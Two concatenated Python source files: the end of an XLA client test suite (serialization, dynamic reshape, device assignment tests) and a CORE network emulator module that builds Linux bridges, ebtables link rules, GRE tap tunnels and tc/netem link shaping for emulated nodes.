tests.append(TracebackTest)
class ClientTest(ComputationTest):
def setUp(self):
super(ClientTest, self).setUp()
self.backend = xla_backend()
def testPlatformVersion(self):
version = self.backend.platform_version
logging.info("platform_version:\n%s", version)
if self.backend.platform == "cpu":
self.assertEqual(version, "<unknown>")
elif self.backend.platform == "gpu":
# Following is false if not built with --config=cuda
if test_util.is_gpu_available(cuda_only=True):
self.assertTrue(
re.match(r"^cuda \d{4,}$", version),
msg=f"Expected CUDA version string; got {repr(version)}")
else:
self.assertEqual(version, "<unknown>")
elif self.backend.platform == "tpu" and not cloud_tpu:
self.assertIn("tpu", version.lower())
self.assertIn("cl/", version)
@unittest.skipIf(cloud_tpu or tfrt_tpu, "not implemented")
def testExecutableSerialization(self):
if self.backend.platform != "tpu":
self.skipTest("Test requires tpu platform")
c = self._NewComputation()
ops.Add(
ops.Constant(c, NumpyArrayS32([1, 2])),
ops.Constant(c, NumpyArrayS32([3, 4])))
options = xla_client.CompileOptions()
executable = self.backend.compile(c.build(), options)
self.assertLen(executable.hlo_modules(), 1)
serialized = self.backend.serialize_executable(executable)
deserialized = self.backend.deserialize_executable(
serialized,
executable.hlo_modules()[0], options)
expected, = xla_client.execute_with_python_values(executable, (),
self.backend)
actual, = xla_client.execute_with_python_values(deserialized, (),
self.backend)
self.assertTrue(np.all(actual == expected))
tests.append(ClientTest)
# TODO(b/182461453): Add TFRT and cloud TPU implementation of
# ReadDynamicShapes
class DynamicReshapeTest(ComputationTest):
"""Tests related to DynamicReshape."""
def _CompareToPyAndBufferProtocol(self, builder, args, expected_results,
test_fn):
compiled = self.backend.compile(builder.build())
output_buffers = compiled.execute([
self.backend.buffer_from_pyval(
arg, device=compiled.local_devices()[0]) for arg in args
])
self.assertLen(output_buffers, len(expected_results))
for buf, expected in zip(output_buffers, expected_results):
to_py_result = buf.to_py()
self.assertEqual(expected.shape, to_py_result.shape)
test_fn(expected, to_py_result)
if self.backend.platform == "cpu" and buf.dtype != bfloat16:
mview = memoryview(buf)
self.assertEqual(expected.shape, mview.shape)
test_fn(expected, np.asarray(mview))
else:
# Buffer protocol expected to fail on non-cpu platforms and bfloat16
# Note that np.asarray(buf) doesn't throw an exception. To test if the
# error was thrown properly we must use memoryview(buf).
with self.assertRaises(BufferError):
memoryview(buf)
# 1D reshape of full size, half size, and size of 0.
@unittest.skipIf(cloud_tpu or tfrt_tpu or external_tpu, "not implemented")
@parameterized.parameters((5), (3), (0))
def testReshape1D(self, reshape_size):
full_size = 5
c = self._NewComputation()
arg = np.array(reshape_size, dtype=np.int32)
expected = np.array(range(reshape_size), dtype=np.int32)
p = ops.Parameter(c, 0, xla_client.shape_from_pyval(arg))
ops.DynamicReshape(
ops.Constant(c, NumpyArrayS32(range(full_size))), [p], [full_size],
[True])
self._CompareToPyAndBufferProtocol(c, [arg], [expected],
np.testing.assert_equal)
# 2D reshape with an slice on the minor dimension. We test different types
# where the strides may differ between the host and devices. The reshaped
# physical memory layout is not consecutive, and we test if the program can
# return the correct logical view of the data.
@unittest.skipIf(cloud_tpu or tfrt_tpu or external_tpu, "not implemented")
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in int_dtypes + float_dtypes)
def testReshape2D(self, dtype):
arg0 = np.array([[1, 2, 3], [4, 5, 6]], dtype=dtype)
arg1 = np.array(2, dtype=np.int32)
expected = np.array([[1, 2], [4, 5]], dtype=np.int32)
c = self._NewComputation()
p0 = ops.Parameter(c, 0, xla_client.shape_from_pyval(arg0))
p1 = ops.Parameter(c, 1, xla_client.shape_from_pyval(arg1))
ops.DynamicReshape(p0, [p1, p1], [2, 3], [False, True])
self._CompareToPyAndBufferProtocol(c, [arg0, arg1], [expected],
np.testing.assert_equal)
@unittest.skipIf(cloud_tpu or tfrt_tpu, "not implemented")
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in int_dtypes + float_dtypes)
def testDynamicShapeArgs(self, dtype):
full_size = 10
dynamic_shape_size = 4
# subcomputation 1
binary_add_builder = self._NewComputation()
scalar_shape = xla_client.Shape.scalar_shape(np.dtype(dtype))
ops.Add(
ops.Parameter(binary_add_builder, 0, scalar_shape),
ops.Parameter(binary_add_builder, 1, scalar_shape))
# subcomputation 2
reshape_reduce_builder = self._NewComputation()
dshape = xla_client.Shape.array_shape(
np.dtype(dtype), dims=[full_size], dynamic_dimensions=[True])
reshape_reduce_p = ops.Parameter(reshape_reduce_builder, 0, dshape)
ops.Reduce(
reshape_reduce_builder,
operands=[reshape_reduce_p],
init_values=[ops.Constant(reshape_reduce_builder, dtype(0))],
computation=binary_add_builder.build(),
dimensions_to_reduce=[0])
# main computation: sum(range(full_size)[:dynamic_shape_size])
c = self._NewComputation()
arg = np.array(dynamic_shape_size, dtype=np.int32)
p = ops.Parameter(c, 0, xla_client.shape_from_pyval(arg))
reshaped = ops.DynamicReshape(
ops.Constant(c, np.array(range(full_size), dtype=dtype)), [p],
[full_size], [True])
ops.Call(c, reshape_reduce_builder.build(), operands=(reshaped,))
self._ExecuteAndCompareClose(c, [arg], [dtype(6)])
tests.append(DynamicReshapeTest)
class DeviceAssignmentTest(ComputationTest):
def testSerialize(self):
shape = (3, 4)
device_assignment = xla_client.DeviceAssignment.create(
np.arange(np.prod(shape)).reshape(*shape))
self.assertEqual(device_assignment.replica_count(), shape[0])
self.assertEqual(device_assignment.computation_count(), shape[1])
serialized = device_assignment.serialize()
self.assertIsInstance(serialized, bytes)
self.assertNotEmpty(serialized)
tests.append(DeviceAssignmentTest)
return tests
def InstantiateTests(globals_dict, backend_fn, test_prefix="", **kw):
# Avoid creating a new backend per test (this causes GPU OOM, and is probably
# inefficient).
backend_fn = functools.lru_cache(maxsize=None)(backend_fn)
for klass in TestFactory(backend_fn, **kw):
test = type(test_prefix + klass.__name__, (klass,), {})
# Clean up the qualified names of the tests to not include the test factory.
test.__qualname__ = test.__name__
globals_dict[test.__name__] = test
backends = {
"cpu": xla_client.make_cpu_client,
"gpu": xla_client.make_gpu_client,
}
if __name__ == "__main__":
flags.DEFINE_string("backend", "cpu", "Target platform.")
# pylint: disable=unnecessary-lambda
InstantiateTests(globals(), lambda: backends[FLAGS.backend]())
# pylint: enable=unnecessary-lambda
absltest.main()
|
network.py | """
Defines network nodes used within core.
"""
import logging
import os
import socket
import threading
import time
from socket import AF_INET, AF_INET6
from core import CoreCommandError, constants, utils
from core.emulator.data import LinkData
from core.emulator.enumerations import LinkTypes, NodeTypes, RegisterTlvs
from core.nodes import ipaddress
from core.nodes.base import CoreNetworkBase
from core.nodes.interface import GreTap, Veth
utils.check_executables(
[constants.BRCTL_BIN, constants.IP_BIN, constants.EBTABLES_BIN, constants.TC_BIN]
)
ebtables_lock = threading.Lock()
class EbtablesQueue(object):
"""
Helper class for queuing up ebtables commands into rate-limited
atomic commits. This improves performance and reliability when there are
many WLAN link updates.
"""
# update rate is every 300ms
rate = 0.3
# ebtables
atomic_file = "/tmp/pycore.ebtables.atomic"
def __init__(self):
"""
Initialize the helper class, but don't start the update thread
until a WLAN is instantiated.
"""
self.doupdateloop = False
self.updatethread = None
# this lock protects cmds and updates lists
self.updatelock = threading.Lock()
# list of pending ebtables commands
self.cmds = []
# list of WLANs requiring update
self.updates = []
# timestamps of last WLAN update; this keeps track of WLANs that are
# using this queue
self.last_update_time = {}
def startupdateloop(self, wlan):
"""
Kick off the update loop; only needs to be invoked once.
:return: nothing
"""
with self.updatelock:
self.last_update_time[wlan] = time.time()
if self.doupdateloop:
return
self.doupdateloop = True
self.updatethread = threading.Thread(target=self.updateloop)
self.updatethread.daemon = True
self.updatethread.start()
def stopupdateloop(self, wlan):
"""
Kill the update loop thread if there are no more WLANs using it.
:return: nothing
"""
with self.updatelock:
try:
del self.last_update_time[wlan]
except KeyError:
logging.exception(
"error deleting last update time for wlan, ignored before: %s", wlan
)
if len(self.last_update_time) > 0:
return
self.doupdateloop = False
if self.updatethread:
self.updatethread.join()
self.updatethread = None
def ebatomiccmd(self, cmd):
"""
Helper for building ebtables atomic file command list.
:param list[str] cmd: ebtable command
:return: ebtable atomic command
:rtype: list[str]
"""
r = [constants.EBTABLES_BIN, "--atomic-file", self.atomic_file]
if cmd:
r.extend(cmd)
return r
def lastupdate(self, wlan):
"""
Return the time elapsed since this WLAN was last updated.
:param wlan: wlan entity
:return: elpased time
:rtype: float
"""
try:
elapsed = time.time() - self.last_update_time[wlan]
except KeyError:
self.last_update_time[wlan] = time.time()
elapsed = 0.0
return elapsed
def updated(self, wlan):
"""
Keep track of when this WLAN was last updated.
:param wlan: wlan entity
:return: nothing
"""
self.last_update_time[wlan] = time.time()
self.updates.remove(wlan)
def updateloop(self):
"""
Thread target that looks for WLANs needing update, and
rate limits the amount of ebtables activity. Only one userspace program
should use ebtables at any given time, or results can be unpredictable.
:return: nothing
"""
while self.doupdateloop:
with self.updatelock:
for wlan in self.updates:
# Check if wlan is from a previously closed session. Because of the
# rate limiting scheme employed here, this may happen if a new session
# is started soon after closing a previous session.
# TODO: if these are WlanNodes, this will never throw an exception
try:
wlan.session
except Exception:
# Just mark as updated to remove from self.updates.
self.updated(wlan)
continue
if self.lastupdate(wlan) > self.rate:
self.buildcmds(wlan)
self.ebcommit(wlan)
self.updated(wlan)
time.sleep(self.rate)
def ebcommit(self, wlan):
"""
Perform ebtables atomic commit using commands built in the self.cmds list.
:return: nothing
"""
# save kernel ebtables snapshot to a file
args = self.ebatomiccmd(["--atomic-save"])
utils.check_cmd(args)
# modify the table file using queued ebtables commands
for c in self.cmds:
args = self.ebatomiccmd(c)
utils.check_cmd(args)
self.cmds = []
# commit the table file to the kernel
args = self.ebatomiccmd(["--atomic-commit"])
utils.check_cmd(args)
try:
os.unlink(self.atomic_file)
except OSError:
logging.exception("error removing atomic file: %s", self.atomic_file)
def ebchange(self, wlan):
"""
Flag a change to the given WLAN"s _linked dict, so the ebtables
chain will be rebuilt at the next interval.
:return: nothing
"""
with self.updatelock:
if wlan not in self.updates:
self.updates.append(wlan)
def buildcmds(self, wlan):
"""
Inspect a _linked dict from a wlan, and rebuild the ebtables chain for that WLAN.
:return: nothing
"""
with wlan._linked_lock:
# flush the chain
self.cmds.extend([["-F", wlan.brname]])
# rebuild the chain
for netif1, v in wlan._linked.items():
for netif2, linked in v.items():
if wlan.policy == "DROP" and linked:
self.cmds.extend(
[
[
"-A",
wlan.brname,
"-i",
netif1.localname,
"-o",
netif2.localname,
"-j",
"ACCEPT",
],
[
"-A",
wlan.brname,
"-o",
netif1.localname,
"-i",
netif2.localname,
"-j",
"ACCEPT",
],
]
)
elif wlan.policy == "ACCEPT" and not linked:
self.cmds.extend(
[
[
"-A",
wlan.brname,
"-i",
netif1.localname,
"-o",
netif2.localname,
"-j",
"DROP",
],
[
"-A",
wlan.brname,
"-o",
netif1.localname,
"-i",
netif2.localname,
"-j",
"DROP",
],
]
)
# a global object because all WLANs share the same queue
# cannot have multiple threads invoking the ebtables commnd
ebq = EbtablesQueue()
def ebtablescmds(call, cmds):
"""
Run ebtable commands.
:param func call: function to call commands
:param list cmds: commands to call
:return: nothing
"""
with ebtables_lock:
for args in cmds:
call(args)
class CoreNetwork(CoreNetworkBase):
"""
Provides linux bridge network functionality for core nodes.
"""
policy = "DROP"
def __init__(self, session, _id=None, name=None, start=True, policy=None):
"""
Creates a LxBrNet instance.
:param core.session.Session session: core session instance
:param int _id: object id
:param str name: object name
:param bool start: start flag
:param policy: network policy
"""
CoreNetworkBase.__init__(self, session, _id, name, start)
if name is None:
name = str(self.id)
if policy is not None:
self.policy = policy
self.name = name
sessionid = self.session.short_session_id()
self.brname = "b.%s.%s" % (str(self.id), sessionid)
self.up = False
if start:
self.startup()
ebq.startupdateloop(self)
def startup(self):
"""
Linux bridge starup logic.
:return: nothing
:raises CoreCommandError: when there is a command exception
"""
utils.check_cmd([constants.BRCTL_BIN, "addbr", self.brname])
# turn off spanning tree protocol and forwarding delay
utils.check_cmd([constants.BRCTL_BIN, "stp", self.brname, "off"])
utils.check_cmd([constants.BRCTL_BIN, "setfd", self.brname, "0"])
utils.check_cmd([constants.IP_BIN, "link", "set", self.brname, "up"])
# create a new ebtables chain for this bridge
ebtablescmds(
utils.check_cmd,
[
[constants.EBTABLES_BIN, "-N", self.brname, "-P", self.policy],
[
constants.EBTABLES_BIN,
"-A",
"FORWARD",
"--logical-in",
self.brname,
"-j",
self.brname,
],
],
)
# turn off multicast snooping so mcast forwarding occurs w/o IGMP joins
snoop = "/sys/devices/virtual/net/%s/bridge/multicast_snooping" % self.brname
if os.path.exists(snoop):
with open(snoop, "w") as snoop_file:
snoop_file.write("0")
self.up = True
def shutdown(self):
"""
Linux bridge shutdown logic.
:return: nothing
"""
if not self.up:
return
ebq.stopupdateloop(self)
try:
utils.check_cmd([constants.IP_BIN, "link", "set", self.brname, "down"])
utils.check_cmd([constants.BRCTL_BIN, "delbr", self.brname])
ebtablescmds(
utils.check_cmd,
[
[
constants.EBTABLES_BIN,
"-D",
"FORWARD",
"--logical-in",
self.brname,
"-j",
self.brname,
],
[constants.EBTABLES_BIN, "-X", self.brname],
],
)
except CoreCommandError:
logging.exception("error during shutdown")
# removes veth pairs used for bridge-to-bridge connections
for netif in self.netifs():
netif.shutdown()
self._netif.clear()
self._linked.clear()
del self.session
self.up = False
# TODO: this depends on a subtype with localname defined, seems like the wrong place for this to live
def attach(self, netif):
"""
Attach a network interface.
:param core.netns.vnode.VEth netif: network interface to attach
:return: nothing
"""
if self.up:
utils.check_cmd(
[constants.BRCTL_BIN, "addif", self.brname, netif.localname]
)
utils.check_cmd([constants.IP_BIN, "link", "set", netif.localname, "up"])
CoreNetworkBase.attach(self, netif)
def detach(self, netif):
"""
Detach a network interface.
:param core.nodes.interface.Veth netif: network interface to detach
:return: nothing
"""
if self.up:
utils.check_cmd(
[constants.BRCTL_BIN, "delif", self.brname, netif.localname]
)
CoreNetworkBase.detach(self, netif)
def linked(self, netif1, netif2):
"""
Determine if the provided network interfaces are linked.
:param core.nodes.interface.CoreInterface netif1: interface one
:param core.nodes.interface.CoreInterface netif2: interface two
:return: True if interfaces are linked, False otherwise
:rtype: bool
"""
# check if the network interfaces are attached to this network
if self._netif[netif1.netifi] != netif1:
raise ValueError("inconsistency for netif %s" % netif1.name)
if self._netif[netif2.netifi] != netif2:
raise ValueError("inconsistency for netif %s" % netif2.name)
try:
linked = self._linked[netif1][netif2]
except KeyError:
if self.policy == "ACCEPT":
linked = True
elif self.policy == "DROP":
linked = False
else:
raise Exception("unknown policy: %s" % self.policy)
self._linked[netif1][netif2] = linked
return linked
def unlink(self, netif1, netif2):
"""
Unlink two PyCoreNetIfs, resulting in adding or removing ebtables
filtering rules.
:param core.nodes.interface.CoreInterface netif1: interface one
:param core.nodes.interface.CoreInterface netif2: interface two
:return: nothing
"""
with self._linked_lock:
if not self.linked(netif1, netif2):
return
self._linked[netif1][netif2] = False
ebq.ebchange(self)
def link(self, netif1, netif2):
"""
Link two PyCoreNetIfs together, resulting in adding or removing
ebtables filtering rules.
:param core.nodes.interface.CoreInterface netif1: interface one
:param core.nodes.interface.CoreInterface netif2: interface two
:return: nothing
"""
with self._linked_lock:
if self.linked(netif1, netif2):
return
self._linked[netif1][netif2] = True
ebq.ebchange(self)
def linkconfig(
self,
netif,
bw=None,
delay=None,
loss=None,
duplicate=None,
jitter=None,
netif2=None,
devname=None,
):
"""
Configure link parameters by applying tc queuing disciplines on the interface.
:param core.nodes.interface.Veth netif: interface one
:param bw: bandwidth to set to
:param delay: packet delay to set to
:param loss: packet loss to set to
:param duplicate: duplicate percentage to set to
:param jitter: jitter to set to
:param core.netns.vif.Veth netif2: interface two
:param devname: device name
:return: nothing
"""
if devname is None:
devname = netif.localname
tc = [constants.TC_BIN, "qdisc", "replace", "dev", devname]
parent = ["root"]
changed = False
if netif.setparam("bw", bw):
# from tc-tbf(8): minimum value for burst is rate / kernel_hz
if bw is not None:
burst = max(2 * netif.mtu, bw / 1000)
# max IP payload
limit = 0xFFFF
tbf = ["tbf", "rate", str(bw), "burst", str(burst), "limit", str(limit)]
if bw > 0:
if self.up:
logging.debug(
"linkconfig: %s" % ([tc + parent + ["handle", "1:"] + tbf],)
)
utils.check_cmd(tc + parent + ["handle", "1:"] + tbf)
netif.setparam("has_tbf", True)
changed = True
elif netif.getparam("has_tbf") and bw <= 0:
tcd = [] + tc
tcd[2] = "delete"
if self.up:
utils.check_cmd(tcd + parent)
netif.setparam("has_tbf", False)
# removing the parent removes the child
netif.setparam("has_netem", False)
changed = True
if netif.getparam("has_tbf"):
parent = ["parent", "1:1"]
netem = ["netem"]
changed = max(changed, netif.setparam("delay", delay))
if loss is not None:
loss = float(loss)
changed = max(changed, netif.setparam("loss", loss))
if duplicate is not None:
duplicate = int(duplicate)
changed = max(changed, netif.setparam("duplicate", duplicate))
changed = max(changed, netif.setparam("jitter", jitter))
if not changed:
return
# jitter and delay use the same delay statement
if delay is not None:
netem += ["delay", "%sus" % delay]
if jitter is not None:
if delay is None:
netem += ["delay", "0us", "%sus" % jitter, "25%"]
else:
netem += ["%sus" % jitter, "25%"]
if loss is not None and loss > 0:
netem += ["loss", "%s%%" % min(loss, 100)]
if duplicate is not None and duplicate > 0:
netem += ["duplicate", "%s%%" % min(duplicate, 100)]
delay_check = delay is None or delay <= 0
jitter_check = jitter is None or jitter <= 0
loss_check = loss is None or loss <= 0
duplicate_check = duplicate is None or duplicate <= 0
if all([delay_check, jitter_check, loss_check, duplicate_check]):
# possibly remove netem if it exists and parent queue wasn't removed
if not netif.getparam("has_netem"):
return
tc[2] = "delete"
if self.up:
logging.debug("linkconfig: %s" % ([tc + parent + ["handle", "10:"]],))
utils.check_cmd(tc + parent + ["handle", "10:"])
netif.setparam("has_netem", False)
elif len(netem) > 1:
if self.up:
logging.debug(
"linkconfig: %s" % ([tc + parent + ["handle", "10:"] + netem],)
)
utils.check_cmd(tc + parent + ["handle", "10:"] + netem)
netif.setparam("has_netem", True)
def linknet(self, net):
"""
Link this bridge with another by creating a veth pair and installing
each device into each bridge.
:param core.netns.vnet.LxBrNet net: network to link with
:return: created interface
:rtype: Veth
"""
sessionid = self.session.short_session_id()
try:
_id = "%x" % self.id
except TypeError:
_id = "%s" % self.id
try:
net_id = "%x" % net.id
except TypeError:
net_id = "%s" % net.id
localname = "veth%s.%s.%s" % (_id, net_id, sessionid)
if len(localname) >= 16:
raise ValueError("interface local name %s too long" % localname)
name = "veth%s.%s.%s" % (net_id, _id, sessionid)
if len(name) >= 16:
raise ValueError("interface name %s too long" % name)
netif = Veth(
node=None, name=name, localname=localname, mtu=1500, net=self, start=self.up
)
self.attach(netif)
if net.up:
# this is similar to net.attach() but uses netif.name instead
# of localname
utils.check_cmd([constants.BRCTL_BIN, "addif", net.brname, netif.name])
utils.check_cmd([constants.IP_BIN, "link", "set", netif.name, "up"])
i = net.newifindex()
net._netif[i] = netif
with net._linked_lock:
net._linked[netif] = {}
netif.net = self
netif.othernet = net
return netif
def getlinknetif(self, net):
"""
Return the interface of that links this net with another net
(that were linked using linknet()).
:param core.nodes.base.CoreNetworkBase net: interface to get link for
:return: interface the provided network is linked to
:rtype: core.nodes.interface.CoreInterface
"""
for netif in self.netifs():
if hasattr(netif, "othernet") and netif.othernet == net:
return netif
return None
def addrconfig(self, addrlist):
"""
Set addresses on the bridge.
:param list[str] addrlist: address list
:return: nothing
"""
if not self.up:
return
for addr in addrlist:
utils.check_cmd(
[constants.IP_BIN, "addr", "add", str(addr), "dev", self.brname]
)
class GreTapBridge(CoreNetwork):
"""
A network consisting of a bridge with a gretap device for tunneling to
another system.
"""
def __init__(
self,
session,
remoteip=None,
_id=None,
name=None,
policy="ACCEPT",
localip=None,
ttl=255,
key=None,
start=True,
):
"""
Create a GreTapBridge instance.
:param core.emulator.session.Session session: core session instance
:param str remoteip: remote address
:param int _id: object id
:param str name: object name
:param policy: network policy
:param str localip: local address
:param ttl: ttl value
:param key: gre tap key
:param bool start: start flag
"""
CoreNetwork.__init__(
self, session=session, _id=_id, name=name, policy=policy, start=False
)
self.grekey = key
if self.grekey is None:
self.grekey = self.session.id ^ self.id
self.localnum = None
self.remotenum = None
self.remoteip = remoteip
self.localip = localip
self.ttl = ttl
if remoteip is None:
self.gretap = None
else:
self.gretap = GreTap(
node=self,
session=session,
remoteip=remoteip,
localip=localip,
ttl=ttl,
key=self.grekey,
)
if start:
self.startup()
def startup(self):
"""
Creates a bridge and adds the gretap device to it.
:return: nothing
"""
CoreNetwork.startup(self)
if self.gretap:
self.attach(self.gretap)
def shutdown(self):
"""
Detach the gretap device and remove the bridge.
:return: nothing
"""
if self.gretap:
self.detach(self.gretap)
self.gretap.shutdown()
self.gretap = None
CoreNetwork.shutdown(self)
def addrconfig(self, addrlist):
"""
Set the remote tunnel endpoint. This is a one-time method for
creating the GreTap device, which requires the remoteip at startup.
The 1st address in the provided list is remoteip, 2nd optionally
specifies localip.
:param list addrlist: address list
:return: nothing
"""
if self.gretap:
raise ValueError("gretap already exists for %s" % self.name)
remoteip = addrlist[0].split("/")[0]
localip = None
if len(addrlist) > 1:
localip = addrlist[1].split("/")[0]
self.gretap = GreTap(
session=self.session,
remoteip=remoteip,
localip=localip,
ttl=self.ttl,
key=self.grekey,
)
self.attach(self.gretap)
def setkey(self, key):
"""
Set the GRE key used for the GreTap device. This needs to be set
prior to instantiating the GreTap device (before addrconfig).
:param key: gre key
:return: nothing
"""
self.grekey = key
class CtrlNet(CoreNetwork):
"""
Control network functionality.
"""
policy = "ACCEPT"
# base control interface index
CTRLIF_IDX_BASE = 99
DEFAULT_PREFIX_LIST = [
"172.16.0.0/24 172.16.1.0/24 172.16.2.0/24 172.16.3.0/24 172.16.4.0/24",
"172.17.0.0/24 172.17.1.0/24 172.17.2.0/24 172.17.3.0/24 172.17.4.0/24",
"172.18.0.0/24 172.18.1.0/24 172.18.2.0/24 172.18.3.0/24 172.18.4.0/24",
"172.19.0.0/24 172.19.1.0/24 172.19.2.0/24 172.19.3.0/24 172.19.4.0/24",
]
def __init__(
self,
session,
_id="ctrlnet",
name=None,
prefix=None,
hostid=None,
start=True,
assign_address=True,
updown_script=None,
serverintf=None,
):
"""
Creates a CtrlNet instance.
:param core.emulator.session.Session session: core session instance
:param int _id: node id
:param str name: node namee
:param prefix: control network ipv4 prefix
:param hostid: host id
:param bool start: start flag
:param str assign_address: assigned address
:param str updown_script: updown script
:param serverintf: server interface
:return:
"""
self.prefix = ipaddress.Ipv4Prefix(prefix)
self.hostid = hostid
self.assign_address = assign_address
self.updown_script = updown_script
self.serverintf = serverintf
CoreNetwork.__init__(self, session, _id=_id, name=name, start=start)
def startup(self):
"""
Startup functionality for the control network.
:return: nothing
:raises CoreCommandError: when there is a command exception
"""
if self.detectoldbridge():
return
CoreNetwork.startup(self)
if self.hostid:
addr = self.prefix.addr(self.hostid)
else:
addr = self.prefix.max_addr()
logging.info("added control network bridge: %s %s", self.brname, self.prefix)
if self.assign_address:
addrlist = ["%s/%s" % (addr, self.prefix.prefixlen)]
self.addrconfig(addrlist=addrlist)
logging.info("address %s", addr)
if self.updown_script:
logging.info(
"interface %s updown script (%s startup) called",
self.brname,
self.updown_script,
)
utils.check_cmd([self.updown_script, self.brname, "startup"])
if self.serverintf:
# sets the interface as a port of the bridge
utils.check_cmd(
[constants.BRCTL_BIN, "addif", self.brname, self.serverintf]
)
# bring interface up
utils.check_cmd([constants.IP_BIN, "link", "set", self.serverintf, "up"])
def detectoldbridge(self):
"""
Occasionally, control net bridges from previously closed sessions are not cleaned up.
Check if there are old control net bridges and delete them
:return: True if an old bridge was detected, False otherwise
:rtype: bool
"""
status, output = utils.cmd_output([constants.BRCTL_BIN, "show"])
if status != 0:
logging.error("Unable to retrieve list of installed bridges")
else:
lines = output.split("\n")
for line in lines[1:]:
cols = line.split("\t")
oldbr = cols[0]
flds = cols[0].split(".")
if len(flds) == 3:
if flds[0] == "b" and flds[1] == self.id:
logging.error(
"error: An active control net bridge (%s) found. "
"An older session might still be running. "
"Stop all sessions and, if needed, delete %s to continue.",
oldbr,
oldbr,
)
return True
return False
def shutdown(self):
"""
Control network shutdown.
:return: nothing
"""
if self.serverintf is not None:
try:
utils.check_cmd(
[constants.BRCTL_BIN, "delif", self.brname, self.serverintf]
)
except CoreCommandError:
logging.exception(
"error deleting server interface %s from bridge %s",
self.serverintf,
self.brname,
)
if self.updown_script is not None:
try:
logging.info(
"interface %s updown script (%s shutdown) called",
self.brname,
self.updown_script,
)
utils.check_cmd([self.updown_script, self.brname, "shutdown"])
except CoreCommandError:
logging.exception("error issuing shutdown script shutdown")
CoreNetwork.shutdown(self)
def all_link_data(self, flags):
"""
Do not include CtrlNet in link messages describing this session.
:param flags: message flags
:return: list of link data
:rtype: list[core.data.LinkData]
"""
return []
class PtpNet(CoreNetwork):
"""
Peer to peer network node.
"""
policy = "ACCEPT"
def attach(self, netif):
"""
Attach a network interface, but limit attachment to two interfaces.
:param core.netns.vif.VEth netif: network interface
:return: nothing
"""
if len(self._netif) >= 2:
raise ValueError(
"Point-to-point links support at most 2 network interfaces"
)
CoreNetwork.attach(self, netif)
def data(self, message_type, lat=None, lon=None, alt=None):
"""
Do not generate a Node Message for point-to-point links. They are
built using a link message instead.
:param message_type: purpose for the data object we are creating
:param float lat: latitude
:param float lon: longitude
:param float alt: altitude
:return: node data object
:rtype: core.emulator.data.NodeData
"""
return None
def all_link_data(self, flags):
"""
Build CORE API TLVs for a point-to-point link. One Link message
describes this network.
:param flags: message flags
:return: list of link data
:rtype: list[core.emulator.data.LinkData]
"""
all_links = []
if len(self._netif) != 2:
return all_links
if1, if2 = self._netif.values()
unidirectional = 0
if if1.getparams() != if2.getparams():
unidirectional = 1
interface1_ip4 = None
interface1_ip4_mask = None
interface1_ip6 = None
interface1_ip6_mask = None
for address in if1.addrlist:
ip, _sep, mask = address.partition("/")
mask = int(mask)
if ipaddress.is_ipv4_address(ip):
family = AF_INET
ipl = socket.inet_pton(family, ip)
interface1_ip4 = ipaddress.IpAddress(af=family, address=ipl)
interface1_ip4_mask = mask
else:
family = AF_INET6
ipl = socket.inet_pton(family, ip)
interface1_ip6 = ipaddress.IpAddress(af=family, address=ipl)
interface1_ip6_mask = mask
interface2_ip4 = None
interface2_ip4_mask = None
interface2_ip6 = None
interface2_ip6_mask = None
for address in if2.addrlist:
ip, _sep, mask = address.partition("/")
mask = int(mask)
if ipaddress.is_ipv4_address(ip):
family = AF_INET
ipl = socket.inet_pton(family, ip)
interface2_ip4 = ipaddress.IpAddress(af=family, address=ipl)
interface2_ip4_mask = mask
else:
family = AF_INET6
ipl = socket.inet_pton(family, ip)
interface2_ip6 = ipaddress.IpAddress(af=family, address=ipl)
interface2_ip6_mask = mask
link_data = LinkData(
message_type=flags,
node1_id=if1.node.id,
node2_id=if2.node.id,
link_type=self.linktype,
unidirectional=unidirectional,
delay=if1.getparam("delay"),
bandwidth=if1.getparam("bw"),
per=if1.getparam("loss"),
dup=if1.getparam("duplicate"),
jitter=if1.getparam("jitter"),
interface1_id=if1.node.getifindex(if1),
interface1_mac=if1.hwaddr,
interface1_ip4=interface1_ip4,
interface1_ip4_mask=interface1_ip4_mask,
interface1_ip6=interface1_ip6,
interface1_ip6_mask=interface1_ip6_mask,
interface2_id=if2.node.getifindex(if2),
interface2_mac=if2.hwaddr,
interface2_ip4=interface2_ip4,
interface2_ip4_mask=interface2_ip4_mask,
interface2_ip6=interface2_ip6,
interface2_ip6_mask=interface2_ip6_mask,
)
all_links.append(link_data)
# build a 2nd link message for the upstream link parameters
# (swap if1 and if2)
if unidirectional:
link_data = LinkData(
message_type=0,
node1_id=if2.node.id,
node2_id=if1.node.id,
delay=if2.getparam("delay"),
bandwidth=if2.getparam("bw"),
per=if2.getparam("loss"),
dup=if2.getparam("duplicate"),
jitter=if2.getparam("jitter"),
unidirectional=1,
interface1_id=if2.node.getifindex(if2),
interface2_id=if1.node.getifindex(if1),
)
all_links.append(link_data)
return all_links
class SwitchNode(CoreNetwork):
"""
Provides switch functionality within a core node.
"""
apitype = NodeTypes.SWITCH.value
policy = "ACCEPT"
type = "lanswitch"
class HubNode(CoreNetwork):
"""
Provides hub functionality within a core node, forwards packets to all bridge
ports by turning off MAC address learning.
"""
apitype = NodeTypes.HUB.value
policy = "ACCEPT"
type = "hub"
def __init__(self, session, _id=None, name=None, start=True):
"""
Creates a HubNode instance.
:param core.session.Session session: core session instance
:param int _id: node id
:param str name: node namee
:param bool start: start flag
:raises CoreCommandError: when there is a command exception
"""
CoreNetwork.__init__(self, session, _id, name, start)
# TODO: move to startup method
if start:
utils.check_cmd([constants.BRCTL_BIN, "setageing", self.brname, "0"])
class WlanNode(CoreNetwork):
"""
Provides wireless lan functionality within a core node.
"""
apitype = NodeTypes.WIRELESS_LAN.value
linktype = LinkTypes.WIRELESS.value
policy = "DROP"
type = "wlan"
def __init__(self, session, _id=None, name=None, start=True, policy=None):
"""
Create a WlanNode instance.
:param core.session.Session session: core session instance
:param int _id: node id
:param str name: node name
:param bool start: start flag
:param policy: wlan policy
"""
CoreNetwork.__init__(self, session, _id, name, start, policy)
# wireless model such as basic range
self.model = None
# mobility model such as scripted
self.mobility = None
# TODO: move to startup method
if start:
utils.check_cmd([constants.BRCTL_BIN, "setageing", self.brname, "0"])
def attach(self, netif):
"""
Attach a network interface.
:param core.nodes.interface.CoreInterface netif: network interface
:return: nothing
"""
CoreNetwork.attach(self, netif)
if self.model:
netif.poshook = self.model.position_callback
if netif.node is None:
return
x, y, z = netif.node.position.get()
# invokes any netif.poshook
netif.setposition(x, y, z)
def setmodel(self, model, config):
"""
Sets the mobility and wireless model.
